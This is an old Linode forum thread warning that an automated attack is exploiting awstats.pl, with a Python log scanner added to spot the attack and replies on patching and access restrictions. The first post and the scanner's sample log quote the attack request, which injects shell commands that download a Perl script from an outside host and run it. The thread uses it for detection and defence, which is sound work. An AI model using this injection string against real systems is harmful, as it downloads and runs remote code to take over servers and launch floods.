Linode Forum
Linode Community Forums
Posted: Sat Apr 23, 2005 8:15 pm
Senior Newbie

Joined: Sat Feb 14, 2004 5:34 pm
Posts: 5
Website: http://www.themeyers.us
AOL: jameyers14
Location: Boston, MA
If you use the awstats web statistics perl script, be warned that there is an automated process exploiting buffer overflow vulnerabilities and spawning off flood attacks. Anyone who uses awstats should check ASAP for the following things to see if you have been compromised:

1) Entries in your apache access logs with the following form: GET /awstats/awstats.pl?configdir=|echo%20;cd%20/var/tmp;killall%20-9%20perl;wget%20http://alekso.mine.nu/a1.txt;perl%20a1.txt|

2) The presence of running processes named 'udp.pl, egx, or f3', or the presence of these files on the filesystem (most likely in /var/tmp).

3) Lots of UDP traffic directed against random hosts (the processes use a random number generator using /dev/urandom to generate targets).

Fix: Remove, disable, or password protect awstats.pl. Unknown if there is a fix available.

John
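
A log check for item 1 of the post above, as an added example that is not part of the original thread: it scans Apache access-log lines for awstats.pl requests whose configdir parameter contains shell metacharacters, and it goes slightly beyond the quoted form by URL-decoding first so a percent-encoded pipe is caught too. The sample log lines, client addresses and function name are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample lines in Apache combined log format; client addresses are
# documentation ranges. The first request has the form quoted in the post.
SAMPLE_LOG = """\
203.0.113.7 - - [23/Apr/2005:19:58:01 -0400] "GET /awstats/awstats.pl?configdir=|echo%20;cd%20/var/tmp;killall%20-9%20perl;wget%20http://alekso.mine.nu/a1.txt;perl%20a1.txt| HTTP/1.1" 200 512 "-" "-"
198.51.100.4 - - [23/Apr/2005:20:01:12 -0400] "GET /awstats/awstats.pl?config=example.org&configdir=/etc/awstats HTTP/1.1" 200 20480 "-" "Mozilla/5.0"
198.51.100.9 - - [23/Apr/2005:20:03:40 -0400] "GET /cgi-bin/awstats.pl?config=site&configdir=%7Cecho%20%7C HTTP/1.0" 200 301 "-" "-"
192.0.2.15 - - [23/Apr/2005:20:05:02 -0400] "GET /index.html HTTP/1.1" 200 1043 "-" "Mozilla/5.0"
"""

# Captures: client, timestamp, request target, status code.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "\S+ (\S+)[^"]*" (\d{3}) ')
# Characters that have no place in a directory path but matter to a shell.
SHELL_META = set("|;`$&<>\n")


def suspicious_awstats_requests(log_text):
    """Return (client, time, status, decoded configdir) for flagged requests."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line
        client, when, target, status = m.groups()
        path, _, query = target.partition("?")
        if not unquote_plus(path).lower().endswith("awstats.pl"):
            continue
        for pair in query.split("&"):
            name, _, value = pair.partition("=")
            if unquote_plus(name).lower() != "configdir":
                continue
            # Decode first so %7C is caught the same way as a literal pipe.
            decoded = unquote_plus(value)
            if SHELL_META & set(decoded):
                hits.append((client, when, int(status), decoded))
    return hits


if __name__ == "__main__":
    for client, when, status, value in suspicious_awstats_requests(SAMPLE_LOG):
        print(f"{when} {client} status={status} configdir={value!r}")
```

A hit with status 200 only shows the request was served, not that the command ran; follow it up with checks 2 and 3 from the post.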


Posted: Sun Apr 24, 2005 12:15 am
Linode Staff

Joined: Fri Oct 17, 2003 12:38 am
Posts: 287
Location: Dr Wierd's Lab, South Jersey Shore
Version 6.4 of awstats was released a bit over a month ago when this vulnerability was discovered. If you have installed awstats via apt-get or similar and regularly run apt-get update && apt-get upgrade or your distribution of choice's equivalent, you should already have the fixed version installed but should double check this.

Michael


Posted: Mon Apr 25, 2005 12:15 am
Senior Member

Joined: Fri Aug 06, 2004 5:49 pm
Posts: 158
Just as a tip, it's generally not a bad idea to keep awstats (and other scripts like awstats) protected behind some password authentication using htpasswd or equivalent.


Posted: Mon Apr 25, 2005 6:27 pm
Senior Newbie

Joined: Sat Feb 14, 2004 5:34 pm
Posts: 5
Website: http://www.themeyers.us
AOL: jameyers14
Location: Boston, MA
Probably an entire new thread, but in theory running Apache in a SELinux sandbox would go a long way to limit the consequences of an exploit of any script or the server process itself. Is SELinux even possible under UML (2.6 kernel)?

John


Posted: Thu Jan 05, 2006 4:46 pm
Junior Member

Joined: Mon Apr 26, 2004 5:03 pm
Posts: 47
SELinux isn't installed in the UML kernel, so linodes can't take advantage of it.


Posted: Thu Jan 05, 2006 5:40 pm
Senior Member

Joined: Sun Nov 14, 2004 6:37 pm
Posts: 138
Website: http://oldos.org
WLM: jasonlfaulkner@hotmail.com
Yahoo Messenger: jasonfncsu
AOL: jaylfaulkner
Location: NC, USA
Easiest way to protect your awstats? chmod 700 the folder when not viewing stats :)

_________________
Jay Faulkner
http://oldos.org


Posted: Fri Jan 06, 2006 9:32 pm
Junior Member

Joined: Wed May 04, 2005 9:08 pm
Posts: 24
Website: http://xcski.com/blogs/pt/
Location: Rochester NY
tierra wrote:
Just as a tip, it's generally not a bad idea to keep awstats (and other scripts like awstats) protected behind some password authentication using htpasswd or equivalent.



I keep a lot of things like this (webalizer, server-status, munin) protected by .htaccess files that only allow access from my own IP (and the proxy server at work).
Code:
    Order deny,allow
    Deny from all
    Allow from 192.168.1.0/24
    Allow from 111.222.333.0/24
    Allow from 127.0.0.0/8

